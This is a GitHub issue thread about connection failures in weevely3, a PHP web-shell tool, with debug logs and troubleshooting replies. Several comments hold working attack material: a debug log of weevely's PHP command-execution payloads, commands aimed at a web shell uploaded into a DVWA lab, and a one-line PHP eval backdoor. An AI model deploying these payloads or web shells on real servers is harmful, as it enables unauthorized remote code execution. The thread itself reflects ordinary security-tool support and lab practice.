### ISSUE TITLE
Backdoor communication failed - weevely 3.5

### ISSUE THREAD

**Issue by noloop** [epinna/weevely3#77]
I am trying the weevely 3.5 here on the same localhost, and I do not get the following:

`[!] [terminal] Backdoor communication failed, check URL availability and password`

**Comment by epinna** [comment]
Make sure agent PHP URL is correct and callable: visit it with a browser or with curl, it should return a blank page. Then make sure the password you're using is correct and you're not using special characters in the password which could be wrongly interpreted by the shell. If everything is correct, typing 

`:set debug true`

and re-send the command to get additional log message.

**Comment by noloop** [comment]
I can usually call a browser and get a blank page. I already tested on more than 5 agents created, the password is correct. When I leave `:set debug true`, I get:

```
[D] [php] PHP setup failed
[!] [terminal] Backdoor communication failed, check URL availability and password
```

**Comment by SalityRoot** [comment]
same problem, no command works.

```
root@kali:~/weevely3-master# ./weevely.py https://www.site.it/test/index.php Pass

[+] weevely 3.5

[+] Target:	www.site.it
[+] Session:	/root/.weevely/sessions/www.site.it/index_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> :set debug true
debug = true
weevely> ls
[D][php] PHP setup running with StegaRef channel
[D][php] PAYLOAD @error_reporting(0);@system('echo 87790');
[D][php] PAYLOAD @error_reporting(0);@passthru('echo 87790');
[D][php] PAYLOAD @error_reporting(0);print(@shell_exec('echo 87790'));
[D][php] PAYLOAD @error_reporting(0);$r=array();@exec('echo 87790',$r);print(join("\n",$r));
[D][php] PAYLOAD @error_reporting(0);$h=@popen('echo 87790','r');if($h){while(!feof($h))echo(fread($h,4096));pclose($h);}
[D][php] PAYLOAD @error_reporting(0);$p=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));$h=@proc_open('echo 87790',$p,$pipes);if($h&&$pipes){while(!feof($pipes[1]))echo(fread($pipes[1],4096));while(!feof($pipes[2]))echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}
[D][php] PAYLOAD @error_reporting(0);@python_eval('import os; os.system('echo87790');');
[D][php] PAYLOAD @error_reporting(0);if(class_exists('Perl')){$perl=new Perl();$r=$perl->system('echo 87790');print($r);}
[D][php] PAYLOAD @error_reporting(0);if(is_callable('pcntl_fork')){$p=@pcntl_fork();if(!$p){@pcntl_exec("/bin/sh",Array("-c",'echo 87790'));}else{@pcntl_waitpid($p,$status);}}
[D][php] PAYLOAD @error_reporting(0);print(@gethostname());
[D][php] PAYLOAD @error_reporting(0);if(is_callable('posix_getpwuid')&&is_callable('posix_geteuid')){$u=@posix_getpwuid(@posix_geteuid());if($u){$u=$u['name'];}else{$u=getenv('username');}print($u);}
[D][php] PAYLOAD @error_reporting(0);@chdir('.')&&print(@getcwd());
[D][module] Shell interpreter unavailable, running the alias 'file_ls'
[D][php] PAYLOAD chdir('/var/www/html/site.it/test');@error_reporting(0);$p=".";if(@is_dir($p)){$d=@opendir($p);$a=array();if($d){while(($f=@readdir($d)))$a[]=$f;sort($a);print(join(PHP_EOL,$a));}}
[D][module] Traceback (most recent call last):
  File "/root/weevely3-master/core/module.py", line 105, in run_cmdline
    result = self.run_argv(command)
  File "/root/weevely3-master/core/module.py", line 192, in run_argv
    return self.run()
  File "/root/weevely3-master/modules/file/ls.py", line 43, in run
    ).run(self.args)
  File "/root/weevely3-master/core/vectors.py", line 124, in run
    result = self.postprocess(result)
  File "/root/weevely3-master/modules/file/ls.py", line 42, in <lambda>
    postprocess = lambda x: x.split('\n')
AttributeError: 'NoneType' object has no attribute 'split'

[-][module] Error, module execution triggered error ''NoneType' object has no attribute 'split''
www.site.it:/var/www/html/site.it/test PHP> 
```

**Comment by epinna** [comment]
@SalityRoot this is actually another error message. Could you please retry again? The unhandled exception should be fixed. If it keeps giving errors, please open a new issue.

**Comment by Piyush06** [comment]
I ran into the same error today but.. the problem is not in any network bu the link which we provide to weevely.
I've noticed you typed https:// for the link.. try with just http:// it will sure work.
thanks.

**Comment by jordantsap** [comment]
Same here

weevely> dir
[-][channel] The remote backdoor request triggers an error 404, check availability
[-][channel] The remote backdoor request triggers an error 404, check availability
[-][channel] The remote backdoor request triggers an error 404, check availability
[-][channel] The remote backdoor request triggers an error 404, check availability
[!][terminal] Backdoor communication failed, check URL availability and password
weevely> :file_ls
[-][channel] The remote backdoor request triggers an error 404, check availability
[-][channel] The remote backdoor request triggers an error 404, check availability
[-][channel] The remote backdoor request triggers an error 404, check availability
[-][channel] The remote backdoor request triggers an error 404, check availability
[!][terminal] Backdoor communication failed, check URL availability and password

**Comment by DebuggerFX** [comment]
> I ran into the same error today but.. the problem is not in any network but the link which we provide to weevely.
> I've noticed you typed https:// for the link.. try with just http:// it will sure work.
> thanks.
> 
> for eg: weevely http://10.0.2.4/dvwa/hackable/uploads/shell.php 123456
> 
> [+] weevely 3.7.0
> 
> [+] Target: 10.0.2.4
> [+] Session: /root/.weevely/sessions/10.0.2.4/shell_1.session
> 
> [+] Browse the filesystem or execute commands starts the connection
> [+] to the target. Type :help for more information.
> 
> weevely> pwd
> [-][channel] The remote script execution triggers an error 500, check script and payload integrity
> /var/www/dvwa/hackable/uploads
> www-data@10.0.2.4:/var/www/dvwa/hackable/uploads $

did u fix this ?

**Comment by starkthakur** [comment]
The issue is quite simple you are not entering the correct path for weevely when establishing the connection due to which its throwing the error or mentioning https:// instead of http://

![image](https://user-images.githubusercontent.com/49287268/87232652-4a01a800-c3de-11ea-9a84-de245270f47f.png)


The way weevely shell command should be enteterd in kali is below : 
![image](https://user-images.githubusercontent.com/49287268/87232679-7fa69100-c3de-11ea-8146-2c56ad0afa18.png)

but we are adding vulnerabilities in between it as well due to which the command becomes in kali as 

root@kali :#  weevely http://10.0.2.6/dvwa/hackable/uploads/shell.php 123456 (Correct Command)
root@kali :#  weevely http://10.0.2.6/dvwa/vulnerabilities/hackable/uploads/shell.php 123456 (Wrong Command)

**Comment by QairexStudio** [comment]
> I can usually call a browser and get a blank page. I already tested on more than 5 agents created, the password is correct. When I leave `:set debug true`, I get:
> 
> ```
> [D] [php] PHP setup failed
> [!] [terminal] Backdoor communication failed, check URL availability and password
> ```

me too how we can fix it?

**Comment by wangweiye** [comment]
you should use root account

**Comment by QairexStudio** [comment]
> you should use root account

im run it as root but it still same

**Comment by ch4xer** [comment]
same problem here.
![image](https://user-images.githubusercontent.com/40637063/147337589-f9506e8a-0559-483d-9e47-981e533f1ae0.png)
Where ths content of shell.php is `<?php @eval($_POST[ch4ser]);?>`

**Comment by Santhosh6303** [comment]
check your php version.Because weevely is not supporting php8.0

**Comment by ZanyMonk** [comment]
Hey @Santhosh6303,
Weevely now supports PHP8, using the default Phar obfuscator.

**Comment by SanthoshCheemala** [comment]
I apologize for any confusion my earlier comment may have caused.Yeah,I also discovered it yesterday.I shouldn't commented without proper researching
